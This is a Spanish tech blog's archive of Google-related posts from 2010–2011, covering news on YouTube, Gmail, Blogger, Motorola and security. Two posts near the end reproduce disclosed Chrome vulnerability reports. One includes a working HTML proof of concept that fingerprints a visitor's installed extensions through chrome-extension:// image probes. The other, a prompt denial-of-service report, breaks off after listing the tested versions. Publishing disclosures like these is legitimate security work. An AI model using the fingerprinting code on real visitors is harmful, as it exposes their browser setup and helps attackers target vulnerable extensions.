Mostrando entradas con la etiqueta google. Mostrar todas las entradas
Mostrando entradas con la etiqueta google. Mostrar todas las entradas

Los videos más vistos de YouTube en 2011

21 diciembre 2011 Publicado por cLimbo 0 comentarios
En un par de semanas estaremos en 2012, y por ello no es raro ver que la mayoría de empresas anuncian datos sobre como les ha ido el año. Tal vez más interesante para nosotros sean datos de servicios tan populares como Google, que hace pocos días anunció su Zeitgeist 2011, es decir, su lista con los resultados más buscados. Es algo que ya se ha convertido en tradición, y que nos permite ver cuales han sido las palabras que más éxito han tenido en las versiones localizadas de Google como por ejemplo Google España.

Siguiendo este lanzamiento, hoy nos encontramos con otros datos interesantes en el blog oficial de otro de los productos claves de los de Mountain View: YouTube. El servicio es a día de hoy el sitio de vídeos más popular de toda la red, y sus datos son realmente impresionantes.

No voy a listar los vídeos más vistos, pero si hacer un pequeño resumen. Globalmente y excluyendo las compañías discográficas, el tema de Rebecca Black “Friday” ha sido el más visto, y ha superado a otros como “Jack Sparrow” con Michel Bolton o al famoso spotde La Fuerza de Volkswagen, que por cierto fue premiado como mejor anuncio del año.

Metiéndonos en la lista de canales, machinima, IGNentertaiment y RayWilliamJohnson están los primeros y se puede decir que son una referencia y crean escuela. Es mejor que le echéis un vistazo por vosotros mismos, pero de momento os dejo con YouTube Rewind 2011, un rebobinado o repaso que ha querido hacer Google a este año dentro de su servicio.






¿Por qué Google descontinúa la aplicación de Gmail para BlackBerry?

10 noviembre 2011 Publicado por cLimbo 0 comentarios

Internet hoy está llena de miles de usuarios lamentándose que Google descontinua aplicación de Gmail para BlackBerry tanto en desarrollo como en su disponibilidad, es decir, no solo dejan de darle soporte y mantenimiento, es que ya no se podrá descargar.


¿Por qué Google mata una aplicación que funciona relativamente bien en una plataforma usada por millones de personas que representan usuarios potenciales del servicio por medio de un software nativo? La respuesta tiene varios matices pero se limita a tres cosas:

1. Optimización: Desde que Erich Schmidt dejó el puesto de CEO y lo asumió Larry Page, Google se encuentra en un proceso de integración y optimización. La unificación del diseño en todas sus propiedades, cerrar servicios que realmente no se están usando, unificar servicios. Por bien que el cliente de Gmail funcione para los usuarios, si este no genera beneficios lo suficientemente interesantes, no me sorprende que sea argumento para que se retire.

2. Competencia: No nos engañemos, BlackBerry es una de las plataformas que compiten con Android. En el proceso de optimización e integración queda claro que Google está buscando que las mejores características de sus propiedades solo puedan ser accesibles desde sus dispositivos. Pasa con algunas características relacionadas a Google Maps que no están disponibles en iPhone (en Android sí) y el mismo cliente de Gmail que, en Android, es superior a cualquier otro sistema operativo móvil. Ni qué hablar de la versión para iOS que duró unas cuantas horas.

3. Dificultad de desarrollo en BlackBerry: Tampoco es un secreto de las dificultades que se encuentran los programadores y las compañías para desarrollar software en esta plataforma. Hace unos meses Seesmic decidió retirar su versión de BlackBerry y algunas otras startups terminaron haciendo lo mismo.

Tres condiciones que definitivamente matan el producto. Por el momento los usuarios de Gmail pueden y podrán seguir leyendo sus correos en BlackBerry configurándolo como POP, IMAP o Exchange (esta última es la que yo recomiendo y lo que uso en mi iPhone). También tienen acceso vía versión web, Google asegura que seguirán desarrollando por este medio.

Pero la marca y la propiedad de Gmail como aplicación móvil, por el momento, solo estará disponible en Android, a menos que la aplicación de iOS vuelva.


Etiquetas: , , ,

Google cumple 13 años

27 septiembre 2011 Publicado por cLimbo 0 comentarios
Si hoy has utilizado el buscador de Google, ya habrás visto el nuevo “doodle”, una imagen conmemorativa de su 13º aniversario. En Internet, trece años no significa pubertad como en la vida de las personas, sino una trayectoria con bastante peso. En el caso de Google, su historia ha cambiado Internet por muchas razones.

Los principios son de sobra conocidos, dos estudiantes de doctorado en Ciencias de Computación de la Universidad de Stanford, Larry Page y Sergey Brin, crearon Google Inc. el 27 de septiembre de 1998 con el fruto de su investigación. A partir de ahí cambió la historia de Internet para siempre.
Desde entonces y hasta aquí, Google se ha convertido en un gigante mediante una particular fórmula: éxito, innovación, adquisiciones de compañías, fracasos en determinados servicios, problemas legales… Con todo, en mayo de este año se hacía pública la cifra de mil millones de usuarios únicos contando buscador, Gmail y YouTube, (ComScore).


Etiquetas: ,

Quiero trabajar en Google, ¿qué tengo que hacer?

16 septiembre 2011 Publicado por cLimbo 0 comentarios
Hay un rumor en Silicon Valley que dice que Google sólo ficha a los más listos del mundo, ingenieros que ganan a partir de 100.000 dólares y que tienen futbolines, masajista, piscina, o comida gratis en su trabajo. Entre los elegidos está Felix, un madrileño que trabaja en la compañía y que ha explicado el funcionamiento del Gigante de Internet en el programa de televisión "Madrileños por el Mundo".


El Campus de Google

¿Cuál es el mejor trabajo del mundo? Obviamente aquel que te permite hacer lo que más te gusta. Si además la empresa incentiva al trabajador con actividades adicionales o instalaciones de ensueño estaremos ante el trabajo ideal. De hecho, en 2009 Google fue elegida en España como una de las mejores empresas para trabajar.

En el reportaje, Felix nos explica su trabajo dentro de la compañía y las ventajas que tiene dentro del Campus. Por ejemplo, los empleados de la compañía pueden organizarse el tiempo como quieran, no tienen horarios fijos para descansar o para realizar determinadas tareas. En las instalaciones del buscador se puede encontrar una cancha de voleibol, varias cafeterías con todo incluido o una zona de relax con guardería y máquinas de videojuegos. Además, los empleados se desplazan en bicicleta dentro del Campus haciendo la estancia aun más agradable.

La vida laboral no puede ser mejor, con una plantilla superior a 26.000 empleados, el buscador es capaz de incentivar a sus trabajadores con subidas de sueldo en bloque como la que llevó a cabo el año pasado mejorando un 10% las nóminas de todos los empleados. Tal como recuerda Felix, "El Googlero siente su trabajo y tiene ganas de hacer las cosas bien".

¿Cómo podemos trabajar en Google?

Ser empleado del buscador más famoso del mundo no es tarea fácil. Según explica Felix, es indispensable hablar inglés perfectamente y tener estudios superiores complementados con un Máster. En España hay programas específicos que se adaptan a las necesidades del gigante de Internet. Por ejemplo, la Universidad Complutense de Madrid cuenta con un MBA para emprendedores que se ajusta a las exigencias de Google.

¿Dónde enviar el currículum?

Google cuenta con una página dedicada al empleo donde aparecen las plazas vacantes. Si crees que cumples los requisitos, adelante. De momento en Silicon Valley hay por lo menos cuatro madrileños trabajando.


Etiquetas: , ,

[Utilidades] Cinco discos duros virtuales donde guardar tus datos con seguridad

13 septiembre 2011 Publicado por cLimbo 0 comentarios

Los servicios en la nube han dejado de ser parte del futuro hace mucho tiempo. Hoy casi sin darnos cuenta utilizamos a diario de una u otra forma servicios de computación a través de Internet. Servicios que actualmente copan prácticamente todo tipo de utilidades con el usuario, el cual no debe saber en su mayoría de amplios conocimientos para manejarse en la gestión de sus recursos.

Discos duros virtuales que sustituyen poco a poco nuestro antiguo mundo físico y desde el que podemos almacenar nuestros datos, documentos o archivos, Podemos hacer con ellos copias de seguridad, transferirlos a otros usuarios o volver a ellos en el momento que lo necesitemos. No sólo eso, la captación de usuarios aumenta en parte debido a la reducción de costes que supone su utilización. Por tanto, es un buen momento para realizar una comparativa de aquellos servicios más utilizados por los usuarios. Veamos cómo salen parados cada uno:

Dropbox


Sin lugar a dudas, uno de los primeros de la lista, al menos en popularidad ya que alberga más de 25 millones de usuarios y tiene presencia en 175 países. Dropbox es un servicio multiplataforma que seguramente debe su éxito a la sencillez del propio programa. Con el servicio podremos almacenar, sincronizar archivos online y entre equipos o compartir archivos y carpetas con otros usuarios.

Como digo, en su sencillez se encuentra la clave del éxito. A través del cliente instalado el usuario podrá subir de manera sencilla los archivos a las carpetas creadas y el mismo cliente se encargara de sincronizarlas. Los archivos en la carpeta de Dropbox podrán ser compartidos por otros usuarios de la suite o también se podrá acceder a ellos desde la propia web del programa.

Dropbox permite cuentas gratuitas o de pago en función del uso de cada usuario. La cuenta gratuita o básica dispone de hasta 2 GB de almacenamiento. La Pro50 (pago) permite hasta 50 GB. Por último, la Pro100 (pago) permite hasta 100 GB. El cliente es multiplataforma y se encuentra disponible para Mac, Windows y Linux además de aplicaciones disponibles en Android, iOS y Blackberry.

SOS Online Backup


Su nombre nos da bastantes pistas de lo que nos ofrece. Afincados en California, el servicio es una perfecta herramienta para realizar copias de seguridad online que permite a los usuarios alojar sus archivos en la nube.SOS Online Backup tiene varias versiones enfocadas a los consumidores/usuarios, pymes y empresas. Es multiplataforma aunque trabaja principalmente en los SO de Windows. También hay versiones del cliente para iPhone, iPad y Blackberry.

Tratándose de la compañía de la que viene, un empresa de seguridad en Internet, su punto fuerte es sin duda la propia seguridad del sistema. Precisamente y debido a ello, SOS no cuenta con ninguna opción gratuita. Existen tarifas que van desde los 9.95 dólares al mes por 50GB de espacio hasta los 80 dólares por un año entero.

iDrive


Otro servicio similar a SOS con el que guardar o almacenar el contenido de nuestras carpetas en la web. A las características básicas que podemos esperar de un servicio así (compartir archivos, crear varias cuentas, recuperación de archivos modificados.. ) iDrive tiene dos cualidades o puntos a favor.
En primer lugar te permite programar la tarea de guardado por día y hora determinadas. Además, el servicio también permite realizar copias incrementales para aprovechar el espacio del que dispone, así como aplicar contraseñas en las carpetas que creamos convenientes por seguridad. El programa cuenta con un cifrado de 128 bits.

Por último debemos hablar de la posibilidad de abrir cuenta gratuita de hasta 5GB, posibilidad que se puede multiplicar hasta los 15GB si conseguimos invitar a otros usuarios. El programa es multi-plataforma y cuanta con aplicaciones gratuitas para iOS y Android.


Blogger estrena su nueva interfaz

02 septiembre 2011 Publicado por cLimbo 0 comentarios
A principios de verano os cotábamos entusiasmados como Google había puesto a disposición de sus usuarios más impacientes un adelanto, en forma de versión de pruebas, de lo que es la nueva interfaz de Blogger, su plataforma para la creación y publicación de blogs. Se trataba de un cambio que seguramente era fruto de la completa renovación que están sufriendo los servicios Google en torno al lanzamiento de Google+, y retocaba la interfaz de éste para dejarla afín al resto de sitios, algo que no se puede decir que hubieran hecho antes ya que Blogger siempre ha ido un poco de por libre.



Tras unos meses de prueba, Google acaba de anunciar el lanzamiento oficial de la interfaz, que ya esta disponible no sólo en el canal de pruebas sino que esta al alcance de cualquiera, aunque vaya a coexistir con la versión anterior durante un tiempo que no se ha especificado. No se trata solamente de un cambio en el look & feel, ya que se ha reescrito completamente el editor y el sistema de gestión de artículos, agregando importantes funcionalidades y mejoras.

Los nuevos cambios permiten entre otras cosas editar o crear artículos con un sólo clic, un editor que facilita la escritura ya que ahora es el protagonista —como siempre debió ser—, ocupando toda la pantalla cual lienzo en blanco, y un sistema de monitorización de datos y estadísticas muy mejorado. Como veis, no sólo se trata de un cambio en los gráficos y elementos de las páginas sino de algo más profundo que cambia totalmente la experiencia del usuario y sube bastante el nivel del servicio a nivel de sencillez y usabilidad.

Sobre Blogger, se puede decir que pese a hace poco saltaba la noticia de que podría tener los días contados, al menos como marca, es un producto que está mas vivo que nunca, y uno de los elegidos por millones de usuarios que se lanzan al mundo de las publicaciones en Internet y no solo eso, los millones que ya hay utilizándolo.

Lanzado a mediados de 1999 y ya habiéndose consolidado como plataforma de blogs, Blogger ha entrado en su madurez afianzando sus características y ofreciendo nuevas opciones, con una interfaz que no sólo vemos actualizada ahora sino que ya se actualizó en 2009 y de nuevo en 2010, ofreciendo un editor de posts mejorados y muchas opciones para la inclusión de imágenes entre otras cosas. Eso, unido a la posibilidad de postear artículos directamente desde Google Docs hacen del servicio de blogs un todoterreno y uno de los grandes del sector. El tal vez el número uno de las plataformas gratuitas que además incluyen alojamiento.


Etiquetas: , ,

La infraestructura de Google

23 agosto 2011 Publicado por cLimbo 0 comentarios
Para una de las compañías tecnológicas más importante de nuestra era, la seguridad tiene que ser uno de los pilares en su funcionamiento del día a día. Pensemos en los desastres, aquellas situaciones límites que se escapan a los problemas cotidianos, ¿qué plan tendrá Google pare esos casos? ¿cómo mantener las infraestructuras ante accidentes que se escapan de la norma? Pues en palabras de Eran Feigenbaum, director de seguridad de la compañía en Google Enterprise, la empresa está preparada para todo tipo de probabilidades, incluso ante la llegada de un ataque extraterrestre a la Tierra.

Y es que la simple probabilidad en estos casos, por pequeña que pueda ser, debe ser tratada con anterioridad para que los desastres no causen un caos en las infraestructuras de California. Mantener el estado de alerta y escenificar todos los escenarios posibles reduce el efecto sorpresa de cualquier imprevisto.

Eran Feigenbaum, antes de llegar a Google en el 2007, había formado parte de de varios proyectos de seguridad. Ex-director de CISO, el hombre fue el encargado de diseñar e implementar sistemas criptográficos en agencias gubernamentales y empresas tecnológicas. Su llegada a Google Enterprise, encargada de mantener la seguridad de Google y la de sus clientes, supuso una revolución en los planes de seguridad de sus infraestructuras, pasando a conformar un nuevo plan exhaustivo ante cualquier situación. Es por esta razón que la empresa incluye situaciones tan anómalas como una posible invasión de extraterrestres. Feigenbaum lo explica:

Tocamos todas las probabilidades, es parte de nuestro plan de recuperación contra los desastres antes de asumir lo peor. El año pasado tratamos la posibilidad de que Google y toda California fueron atacados por alienígenas. Ante esta situación nos preguntamos: ¿qué hacemos? ¿cómo podríamos ejecutar nuestras infraestructuras?

Quizá por esta razón Google opera bajo su propia infraestructura. La compañía tiene actualmente más de 250 empleados dedicados a la seguridad, repartidos entre equipos internos de auditorías, equipos de seguridad física o equipos dedicados al material. Para Feigenbaum, el cloud computing también deber ser actualmente tratado con la máxima seguridad:

Los incidentes ocurren por varias razones y por eso debemos tener un equipo las 24 horas, para poder trabajar en todas las zonas horarias. Cuando ocurre un incidente que afecta a varios clientes es nuestra responsabilidad notificar a los clientes y darles una idea de lo que sucede con sus datos. Lo mismo ocurre con el cloud computing. No es perfecto. No lo es y yo he llegado a estar en un servicio de inteligencia donde éramos capaces de entrar a un equipo que no estaba conectado a la red utilizando diversas tecnologías. Aún así creo que la computación en la nube es de las más seguras, tanto como la que más.

Como vemos, la seguridad en una compañía como Google es máxima prioridad. No podía ser de otra forma teniendo en cuenta la información tan importante que maneja de todos nosotros y de la que dependemos de una u otra forma. En cuanto a sus data center y la propia seguridad de los empleados que pueden acceder o no a ella, la compañía mantiene el mismo nivel de seguridad que muestra ante cualquier eventualidad. Un tour por sus instalaciones nos muestran el nivel de las mismas:



Con Motorola, Google ya puede crear su propio hardware

16 agosto 2011 Publicado por cLimbo 1 comentarios

La noticia llegaba por sorpresa a la hora de comer, sin anestesia ni nada: Google se queda con la división móvil de Motorola por 12.500 millones de dólares. La adquisición ha hecho que los medios se apresuren a reflejar las posibles consecuencias, y la percepción de Android cambia notablemente.

Hasta ahora, Google ha pactado con varias compañías la fabricación de móviles preparados para Android empezando por el Nexus One. Se podría decir tanto ese primer modelo como el Nexus S son los móviles de Google, aunque los fabrican otras compañías. Pero ahora que Google ha absorbido un fabricante de hardware, podrá diseñar los componentes de móviles y tablets justo a su medida.

¿No nos suena de algo ese modo de hacer las cosas? Hay cierta compañía cuyas oficinas centrales están en Cupertino que se mueve bajo una máxima desde sus orígenes: Si quieres crear un buen software, debes preocuparte por el hardware. Y preocuparse por el hardware es, a la práctica, crearlo tú mismo. El iPhone de Apple ha conseguido cifras de adopción y ventas impresionantes, y el iPad va por el mismo camino.

Por ese motivo, ver los titulares de los medios por toda la red ha sido bastante interesante esta tarde. En Apple Weblog opinan desde el mismo titular que Google le da la razón a Apple y su sistema con esta compra, y en Androides son más drásticos y alertan del peligro que puede tener este movimiento para el mismo Android. Antonio Ortiz se pregunta precisamente si es peligroso o no en Xataka. Una de las consecuencias que más rápido se ven es que ahora Google podrá presentar su propio teléfono, compitiendo con Apple usando sus mismas cartas. La pregunta es: ¿Afectará? Ahora que Google puede tener un teléfono con un sistema operativo optimizado específicamente para todos y cada uno de sus componentes, ¿cambiarán las cosas? Ya ha habido otros rastros de intentar redirigir el camino de Android, con pasos como el cierre temporal del código fuente de la versión Honeycomb para tablets. Es obvio que Google quiere llevar a Android por un camino específico, y la comunidad de desarrolladores hace que se vaya ramificando.

Con la capacidad para crear su propio hardware, Google ha hecho que la miremos con otros ojos a partir de ahora. Sólo hace falta que empiecen a crear dispositivos con los criterios de los desarrolladores de Mountain View para que descubramos las consecuencias de esto. Seremos nosotros quienes quizás nos sorprendamos con tablets Android con un rendimiento mucho mayor que el presente en los modelos actuales, o veamos cómo un Android tocado deja camino a otros competidores como Windows Phone. Personalmente pienso que muy mal tienen que ir las cosas como para que Android salga seriamente perjudicado, y más con las asombrosas cifras que tiene ahora mismo en el mercado móvil. Por el momento ya sabemos que Motorola no será el fabricante exclusivo de la gama de dispositivos Nexus, algo que casa bastante con la filosofía de Google.

Google nos avisará si nuestro equipo está infectado de malware

21 julio 2011 Publicado por cLimbo 0 comentarios


El mensaje que ves en la imagen superior es el aviso que nos mostrará Google cuando detecte que nuestro equipo está infectado por algún tipo de bichillo malicioso. El aviso es más que llamativo, lo cual corresponde con la intención que tienen de avisar al usuario para que solucione el problema, ya que de nada serviría que nos muestre un aviso que se encuentra frente al ordenador pueda no verlo.
Resulta un poco curioso el modo en el que se comenzó a desarrollar esta utilidad. Todo comenzó cuando los ingenieros de Google detectaron un tráfico inusual en uno de los centros de datos, tras ver a que correspondía dicho trafico trabajaron con los expertos de seguridad de la compañía y llegaron a una conclusión en la que diversas empresas estaban enviando un tráfico modificado con intenciones nada amigables, este tráfico se enviaba mediante un número pequeño de servidores. Así pues, tras investigar esto Google ha desarrollado este aviso, con el fin de informar a los usuarios.
Desde Google afirman que el malware no tiene un nombre y aseguran que el número total de equipos infectados por este software malicioso podría estar entorno a los dos millones de usuarios. También aseguran que el método por el cual se han podido infectar estos usuarios en el mayor número de casos se ha debido a visos de falsos antivirus, los cuales en lugar de comprobar si nuestro equipo está infectado descargan este software al equipo.
Varios usuarios han trasladado también sus preocupaciones sobre su este aviso puede ser falsificado por las mismas empresas que crean este malware. En la empresa de la gran G afirman que han tenido en cuenta este riesgo y la situación de este aviso dentro del buscador se debe a ese motivo, siendo un lugar que puede ser fácilmente detectado por el usuario si este mensaje ha sido manipulado. Evidentemente esto no hace que el riesgo sea completamente eliminado, pero es una forma bastante mejor que haber dejado el aviso en una página aparte.
Por último, cabe destacar que aunque desde el buscador se nos avise que tenemos infectado nuestro equipo no quiere decir que dejemos de usar otro software que compruebe si la seguridad de nuestro equipo esta comprometida.


Google censura el dominio alternativo de RojaDirecta

25 abril 2011 Publicado por cLimbo 0 comentarios
Rojadirecta, el popular sitio de enlaces a retransmisiones deportivas, protagonizó un hecho polémico hace unos meses: el gobierno de los Estados Unidos se apropió de sus dominios por presuntas violaciones de copyright, pese a que la Justicia española confirmó que sus acciones son legales. Si bien dicha medida no fue levantada, la solución para continuar en funcionamiento fue cambiar de dirección. Pero lejos de resolverse todo, ahora se le suma un nuevo inconveniente, porque Google decidió censurar esta URL alternativa… por una equivocación.


La historia comenzó cuando el buscador recibió un reclamo por DMCA de las Ligas Mayores de Béisbol (MLB, por sus siglas en inglés). Como ocurre en estos casos, la compañía procedió a quitar rápidamente el sitio de sus resultados de búsqueda e incluir la habitual leyenda aclaratoria.

Sin embargo, la petición no estaba relacionada con eso, sino que iba dirigida al departamento de Adsense. El objetivo era que Google dejara de mostrar anuncios publicitarios en Rojadirecta porque, según su criterio, el sitio viola los derechos de autor. Curiosamente, ninguna página de ese dominio muestra banners, sino que solamente lo hacen los sitios de terceros que aparecen dentro de marcos.

Como resultado, al momento de escribir esta entrada, aún continuaban el bloqueo y la correspondiente aclaración. De todas maneras, no se trata de la primera vez que ocurre esto, sino que había pasado algo similar con The Pirate Bay en 2009 y con el mismo Rojadirecta en 2007.

Más allá de la confusión, lo cierto es que si Google intepreta que el sitio incumple las reglas de su plataforma publicitaria, probablemente entienda lo mismo respecto de las políticas del buscador. En definitiva, la empresa es la misma y las normas suelen ser bastante consistentes entre sus distintos productos.

El problema está en que, como bien dicen los propietarios de la web, “es claramente muy fácil ser removido del motor de búsqueda”. Y paradójicamente, el propio buscador está envuelto en una polémica por enlazar a ficheros que podrían constituir violaciones de copyright, algo similar a lo que ocurre con Rojadirecta. Por eso, como mínimo, el gigante de las búsquedas debería analizar los antecedentes para evitar nuevos errores y posibles abusos en estas solicitudes.



Vía | Bitelia

[Top Seguridad] Repaso a 2010

31 diciembre 2010 Publicado por cLimbo 2 comentarios
Este año 2010 que hoy termina ha sido un año intenso en cuanto a seguridad informática se refiere. Hemos sido testigos de ataques a la central nuclear de Irán, a WikiLeaks o a las webs de los partidos políticos en España; también ha sido el año de la creación del cibercomando estadounidense y de la celebración de las primeras cibermaniobras de la Unión Europea. Todo este movimiento a nivel global también tiene su reflejo a nivel de usuario, ya que durante este año hemos asistido a todo un festival de vulnerabilidades de Adobe o Windows y vivimos toda una psicosis por culpa de FireSheep.


Afortunadamente, cada vez es más habitual que los usuarios y las empresas se tomen en serio la seguridad de la información y tomen algunas precauciones a la hora de navegar por Internet o, simplemente, abrir archivos adjuntos en los correos electrónicos. Aún así, no hace mucho, pudimos ver un estudio que puso sobre la mesa que la cultura de la seguridad aún no está implantada en muchas empresas y que aún queda mucho por hacer en este sentido.

Bueno, pues despúes de todo lo que hemos visto durante este 2010, aquí van mis cinco aplicaciones más destacadas relativas a la seguridad en este 2010 que termina:

  • Con Firesheep, la verdad, es que lo pasamos bastante mal. Un complemento para Firefox, que nació de un experimento y con el que nos podían suplantar nuestras identidades en Twitter, Facebook o WordPress entre otros. Desde que nació Firesheep ningún congreso o evento en el que se ofrezca conexión wifi gratuita ha dejado de ser el mismo. ¿Y en qué se basaba?, pues que muchas redes sociales, para que la conexión fuese menos pesada, no usaban SSL, así que este complemento aprovechaba eso, analizaba el tráfico y almacenaba las sesiones, menuda gracia. ¿Y qué podemos hacer para evitarlo?, pues se lanzó un complemento para Firefox, BlackSheep, que era una especie contramedida, que funciona muy bien, y que envía información falsa a Firesheep para confundirlo, pero casi que la mejor solución es forzar el uso del SSL donde sea posible, por ejemplo, mediante las extensiones Force-TLS y HTTPS-Everywhere.

  • Panda Cloud es un antivirus que me gusta mucho, bueno, no sólo a mí, porque creo que hay bastante gente que está de acuerdo y piensa que este producto es una buena solución de seguridad. Apareció tímidamente a finales de 2009, pero este 2010 ha sido el de su despegue y extensión. Un antivirus que se basa en la nube, gratuito y con unos requisitos nada desmesurados.

  • Perder el ordenador portátil es una auténtica faena, ya sea porque te lo hayan robado o por un simple descuido. Para empezar, un estudio nos reveló que la mayoría de las empresas no cifraban la información de los discos duros de sus portátiles, dejando los datos a libre disposición de cualquiera que quisiera espiar (de hecho, también hace poco asistimos al bochornoso fallo de la NASA que vendió equipos informáticos con datos confidenciales que no habían sido borrados). Una aplicación interesante es Prey, una aplicación en software libre con la que podemos localizar nuestro portátil o nuestro smartphone en el caso que nos sea robado o que lo perdamos. La aplicación no está mal, a ver, funciona bajo el supuesto que el que nos roba el equipo lo arranque con el S.O. original que está instalado, para que Prey pueda informar sobre qué redes wifi hay alrededor, conectarse a alguna que esté abierta e informar de ello, pero bueno, no está mal porque si te toca un ladrón algo torpe que no conozca los live CD de las distribuciones Linux o que no sepa sacarle el disco duro al portátil, tendremos alguna posibilidad.

  • Hace poco menos de dos semanas Google presentó en sociedad su servicio de avisos sobre webs potencialmente inseguras. Aunque esto ya era algo que tenían, le han dado una vuelta al servicio y lo incluyen dentro de los resultados de las búsquedas, de manera que si una web ha sido alterada (víctima de un ataque, por ejemplo), Google nos alertará para que lo tengamos en cuenta antes de entrar al sitio web, además, si el webmaster de dicha web está registrado en Google (porque use las herramientas para webmasters), sería notificado por Google para que pudiese actuar sobre su sitio web tan rápido como sea posible.

  • Finalmente, una de mis aplicaciones favoritas de este 2010 es Square Privacy Cleaner, aplicación para borrar el rastro que dejas al usar un PC de uso público, ideal para llevar en una memoria USB y usar después de utilizar el PC de uso público que suele haber en los hoteles.

Estas son mis cinco aplicaciones destacadas de este 2010 sobre seguridad, seguramente me deje alguna en el tintero, así que la lista queda abierta a vuestras aportaciones.



Vía | Bitelia

12 aniversario de Google

27 septiembre 2010 Publicado por cLimbo 0 comentarios
Con este logo tan particular nos saluda hoy el portal de búsquedas de Google, ¿la razón? La celebración del duodécimo aniversario desde su creación. El dibujo que hace de doodle de hoy es obra del artista norteamericano Wayne Thiebaud y lo podemos encontrar tanto en la página internacional como en las locales de todo el mundo.

De modo que fue tal día como hoy hace 12 años que se fundó la empresa del buscador más famosa del mundo… bueno, no exactamente. Si hacemos la consulta en la Wikipedia, encontraremos una fecha diferente, el 4 de septiembre, como día en que Larry Page y Sergey Brin registraron la empresa. Lo que sucede es que la empresa decidió cambiar de fecha en varias ocasiones este aniversario, hasta que en 2005 fue fijado definitivamente el día 27 de septiembre.

Lo verdaderamente significativo en toda esta noticia es que en tan sólo 12 años Google ha pasado de ser una empresa pequeña, una startup a la sombra de otros motores de búsqueda como Altavista, a ser el rey indiscutible de este sector tan lucrativo de la red. No conforme con eso, los de Mountain View han sabido diversificar sus líneas de negocio abarcando otros muchos sector complementarios como Google Maps, Google Docs, Android, Chrome, etc. De modo que es capaz de ofrecer una respuesta completa a muchas de las necesidades tecnológicas del usuario actual.

Desde Bitelia, y personalmente un servidor que escribe estas líneas y que hace de editor de asuntos Google en este blog, no podemos menos que dar la enhorabuena a la empresa esperando que sigan alegrando el panorama digital actual, que gracias a sus muchos colores es mucho más divertido de lo que lo era antes.




Vía | Bitelia

Google Chrome Instaled extensions arbitrary detection

15 septiembre 2010 Publicado por cLimbo 0 comentarios
######################################################
Google Chrome Instaled extensions arbitrary detection
URL afectada: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Notificación al afectado: Sí Confirmación del afectado: Sí Exploit: Sí
######################################################

Cambio de registro: http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

#########
Resumen
#########

¿Cuánta seguridad tiene usar extensiones?

Un atacante puede acceder a través de un iframe a las extensiones de recursos (cabe destacar que en este momento no han encontrado una forma de información alterada de las prórrogas).


>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<

(por ejemplo)

un usuario remoto puede modificar este documento web y llamándolo conel tag meta "base" en un formato incorrecto del doc...

<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">


Por lo que llego a la conclusión de que las extensiones chrome necesitan mejorarse y evitar el acceso no interno de recursos de las páginas web externas .. (optativas de usar file:/// y otros controladores de otros protocolos son también seguros de usar y no dan acceso a los recursos internos contra las señales externas de documentos web ...)

Así el controlador de chrome-extension puede ser utilizado para obtener extensiones instaladas en el navegador del cliente ... y con posiblidad de ver ellos si cualquier extensión es vulnerable a algo, puesto que esta información puede ser utilizada para explotar esta extensión ...

En las extensiones en modo incógnito puede ser fácil de detectar.


###########################
Ejemplo de PoC
###########################

<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>

####################EOF##########################

##############
Descubierto
##############

Descubierto:27 may 2010
Notificado:01 jun 2010
Parcheado:02 sep 2010
Publicado: 07 sep 2010

#######################€ND ########################

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
-----

thz Lost ;-)

Google Chrome and Chrome frame Prompt DoS

16 agosto 2010 Publicado por cLimbo 0 comentarios
###############################################
Google Chrome and Chrome frame Prompt DoS
Afectado: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Reporte en español: http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Notificación al afectado: Exploit disponible:
###############################################

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de "mensajes de alerta" cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.


###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongluencia en todos los sistemas :)


######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

